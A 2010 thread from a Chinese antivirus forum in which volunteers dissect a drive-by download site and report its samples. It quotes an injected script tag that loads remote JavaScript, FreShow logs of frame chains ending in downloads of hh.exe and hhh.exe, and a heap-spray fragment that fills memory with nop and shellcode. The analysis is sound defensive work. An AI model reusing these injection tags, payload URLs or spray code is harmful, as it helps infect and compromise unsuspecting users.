瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 请工程师分析
virussec - 2010-2-17 16:03:00
该用户帖子内容已被屏蔽
qetuop - 2010-2-17 16:22:00
如果该网站异常,建议楼主举报恶意网站

http://tool.ikaka.com/report.asp
DragonKid - 2010-2-17 16:28:00
<script language=javascript src=http://hlq.xorg.pl/c.js?google_ad=02x171_ad></script>
转义符清除(\x,\,%)(参数/无参数)

刚才没弄明白什么意思,不好意思~~
下面是我的版本:
Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
        [frame]http://act.bij.pl/22/mp.htm
            [script]http://act.bij.pl/22/ll0.jpg
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/upp.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/llll1.jpg
            [script]http://act.bij.pl/22/llll.jpg
            [script]http://act.bij.pl/22/lllll.jpg
        [frame]http://act.bij.pl/22/nod.htm
            [frame]http://act.bij.pl/22/lz.htm
                [script]http://act.bij.pl/22/oopk.jpg
                    [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/ll1.jpg
                [script]http://act.bij.pl/22/lz.jpg
        [frame]http://act.bij.pl/22/real.htm
            [frame]http://act.bij.pl/22/myra.htm
                [script]http://act.bij.pl/22/myr.jpg
                    [object]http://act.bij.pl/l/hh.exe
        [frame]http://act.bij.pl/22/rising.htm
            [frame]http://act.bij.pl/22/ofnt.htm
                [script]http://act.bij.pl/22/oopk.jpg
                    [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/uug.jpg
    [script]http://act.bij.pl/22/\"fa.js\"
    [script]http://act.bij.pl/22/\"1.js\"
    [script]http://js.tongji.linezing.com/806392/tongji.js
leo108 - 2010-2-17 16:30:00
Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
        [frame]http://act.bij.pl/22/mp.htm
        [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/real.htm
            [frame]http://act.bij.pl/22/myra.htm
                [script]http://act.bij.pl/22/myr.jpg
        [frame]http://act.bij.pl/22/rising.htm
            [frame]http://act.bij.pl/22/ofnt.htm
                [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/oopk.jpg
                [script]http://act.bij.pl/22/uug.jpg
    [script]http://act.bij.pl/22/\"fa.js\"
    [script]http://act.bij.pl/22/\"1.js\"
目前知道这里,继续
leo108 - 2010-2-17 16:46:00
其他不用了
都是
                [object]http://act.bij.pl/l/hh.exe
这挂马的人真NB,什么加密方法都用上了,建议所有反毒学员都去看看
暗夜的雪 - 2010-2-17 16:47:00
Log is generated by FreShow.
[wide]http://act.bij.pl/22/av.htm
    [frame]http://act.bij.pl/22/mp.htm
        [script]http://act.bij.pl/22/ll0.jpg
        [script]http://act.bij.pl/22/ll1.jpg
        [script]http://act.bij.pl/22/upp.jpg
            [object]http://act.bij.pl/l/hh.exe
        [script]http://act.bij.pl/22/llll1.jpg
        [script]http://act.bij.pl/22/llll.jpg
        [script]http://act.bij.pl/22/lllll.jpg
    [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/lz.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/lz.jpg
    [frame]http://act.bij.pl/22/real.htm
        [frame]http://act.bij.pl/22/myra.htm
            [object]http://act.bij.pl/l/hh.exe
    [frame]http://act.bij.pl/22/rising.htm
        [frame]http://act.bij.pl/22/ofnt.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/uug.jpg
完整版~~累啊~
大部分是shellcode带BD密钥的,有一个是利用real的漏洞。alpha2也能解决~  但是http://act.bij.pl/22/myra.htm这个在Freshow里面获取代码不全,有了很大的迷惑性
辛达星郁 - 2010-2-17 17:49:00
Log is generated by FreShow.
[wide]http://act.bij.pl/22/av.htm
    [frame]http://act.bij.pl/22/mp.htm
        [script]http://act.bij.pl/22/ll0.jpg
        [script]http://act.bij.pl/22/ll1.jpg
        [script]http://act.bij.pl/22/upp.jpg
            [object]http://act.bij.pl/l/hh.exe
        [script]http://act.bij.pl/22/llll1.jpg
        [script]http://act.bij.pl/22/llll.jpg
        [script]http://act.bij.pl/22/lllll.jpg
    [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/lz.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/lz.jpg
    [frame]http://act.bij.pl/22/real.htm
        [frame]http://act.bij.pl/22/myra.htm
            [script]http://act.bij.pl/22/myr.jpg
                [object]http://act.bij.pl/l/hh.exe
    [frame]http://act.bij.pl/22/rising.htm
        [frame]http://act.bij.pl/22/ofnt.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/uug.jpg
辛达星郁 - 2010-2-17 17:52:00
:kaka6: 妈呀!! 还有呢,还没有解完呢,那个只不过是一个链接
辛达星郁 - 2010-2-17 17:59:00
Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
    [script]http://act.bij.pl/22/\"fa.js\"
        [frame]http://act.bij.pl/22/fla.htm
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
                [script]http://act.bij.pl/22/if.swf
            [frame]http://act.bij.pl/22/ +
                [script]http://act.bij.pl/22/if.swf
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
    [script]http://act.bij.pl/22/\"1.js\"
    [script]http://js.tongji.linezing.com/806392/tongji.js
辛达星郁 - 2010-2-17 18:07:00
http://act.bij.pl/22/if.swf这个好象是个flash加密
我下载了,但是我不会解密,把后缀名给成txt代码看了看,不明白代码如下:

function ifmy()
{
var dd = arr.toString().replace(/,/g,"");
dd = dd.replace(/@/g,",")
eval(dd);
for(aniti=ina;aniti<0x600;aniti++)
{memory[aniti]=nop + SC;}}

附件: if.rar
辛达星郁 - 2010-2-17 18:11:00
:kaka6: 整个一个地址让我解乱了
分成两个部分了
http://act.bij.pl/22/av.htm
http://act.bij.pl/22/fa.js
辛达星郁 - 2010-2-17 18:18:00
无语了,下载网马的速度很慢

难道该网址的访问量大

已上报瑞星  hh.exe 和  hhh.exe两个  应该是一样的
那两个都传上去了,保险点:kaka13:
暗夜的雪 - 2010-2-17 18:27:00
[frame]http://act.bij.pl/22/ +
这样的网址能获取到源码么?
是不是用了其他的解密软件?:kaka2:
SWF马一压缩就坏啦~
辛达星郁 - 2010-2-17 22:22:00


引用:
原帖由 暗夜的雪 于 2010-2-17 18:27:00 发表
[frame]http://act.bij.pl/22/ +
这样的网址能获取到源码么?
是不是用了其他的解密软件?:kaka2:
SWF马一压缩就坏啦~


地址貌似失效了,没法截图了

就简单说一下吧,就是有几个网址需要修改一下

比如这里hxxp://act.bij.pl/22/ +    上面有几个代码说明了,最后能得出  hxxp://act.bij.pl/22/ie.html

没办法截图,说不明白
ffme - 2010-2-18 11:23:00
只要一打开浏览器,内存就猛增,几个网页就几百兆,网速超慢假死

就是这个东西作怪吧,请高手帮忙啊,谢谢啊

http://act.bij.pl/22/ie.html
http://act.bij.pl/22/ll1.jpg
http://act.bij.pl/22/mp.htm
http://act.bij.pl/22/nod.htm
http://act.bij.pl/22/real.htm
http://act.bij.pl/22/rising.htm
http://acv.bij.pl/22/ie.html
http://acv.bij.pl/22/mp.htm
http://acv.bij.pl/22/nod.htm
http://acv.bij.pl/22/real.htm
http://acv.bij.pl/22/rising.htm


文件在附件里了

附件: 病毒.rar (2010-2-18 11:22:55, 7.86 K)
该附件被下载次数 195

hqvip - 2010-2-18 14:09:00
太多了……
Log is generated by FreShow.
[wide]http://hlq.xorg.pl/c.js?google_ad=02x171_ad
    [object]http://acv.bij.pl/22/901sd.htm
        [object]http://acv.bij.pl/22/fff.swf
        [object]http://acv.bij.pl/22/iie.swf
        [frame]http://acv.bij.pl/22/av.htm
            [frame]http://acv.bij.pl/22/mp.htm
                [script]http://acv.bij.pl/22/ll0.jpg
                [script]http://acv.bij.pl/22/ll1.jpg
                [script]http://acv.bij.pl/22/upp.jpg
                    [object]http://acv.bij.pl/l/hh.exe
                [script]http://acv.bij.pl/22/llll1.jpg
                [script]http://acv.bij.pl/22/llll.jpg
                [script]http://acv.bij.pl/22/lllll.jpg
            [frame]http://acv.bij.pl/22/nod.htm
                [object]http://acv.bij.pl/22/lz.htm
                    [script]http://acv.bij.pl/22/oopk.jpg
                        [object]http://acv.bij.pl/l/hh.exe
                    [script]http://acv.bij.pl/22/ll1.jpg
                    [script]http://acv.bij.pl/22/lz.jpg
            [frame]http://acv.bij.pl/22/real.htm
                [frame]http://acv.bij.pl/22/myra.htm
                    [script]http://acv.bij.pl/22/myr.jpg
                        [object]http://acv.bij.pl/l/hh.exe
            [frame]http://acv.bij.pl/22/rising.htm
                [frame]http://acv.bij.pl/22/ofnt.htm
                    [script]http://acv.bij.pl/22/oopk.jpg
                        [object]http://acv.bij.pl/l/hh.exe
                    [script]http://acv.bij.pl/22/uug.jpg
        [script]http://acv.bij.pl/22/\"fa.js\"
            [frame]http://acv.bij.pl/22/fla.htm
                [object]http://acv.bij.pl/22/ff.html
                    [object]http://acv.bij.pl/l/hhh.exe
        [script]http://acv.bij.pl/22/\"1.js\"
            [script]http://acv.bij.pl/22/dsn_1.js
                [object]http://acv.bij.pl/22/downtit_01.jpg
                    [object]http://acv.bij.pl/22/second1209.css
                    [object]http://acv.bij.pl/22/360.jpg
                    [object]http://acv.bij.pl/l/hh.exe
                    [object]http://acv.bij.pl/22/downtit_oth_8.jpg
        [script]http://js.tongji.linezing.com/806392/tongji.js

主要是XXtp://act.bij.pl/22/myra.htm
hXXp://act.bij.pl/22/ofnt.htm
hXXp://act.bij.pl/22/lz.htm
hXXp://act.bij.pl/22/fla.htm


好像基本都是hXXp://acv.bij.pl/l/hh.exe
附一张BT的图:
筠林碧湫 - 2010-2-26 12:03:00
天哪 好恐怖 觉得自己学的都解决不了问题啊
1
查看完整版本: 请工程师分析
© 2000 - 2024 Rising Corp. Ltd.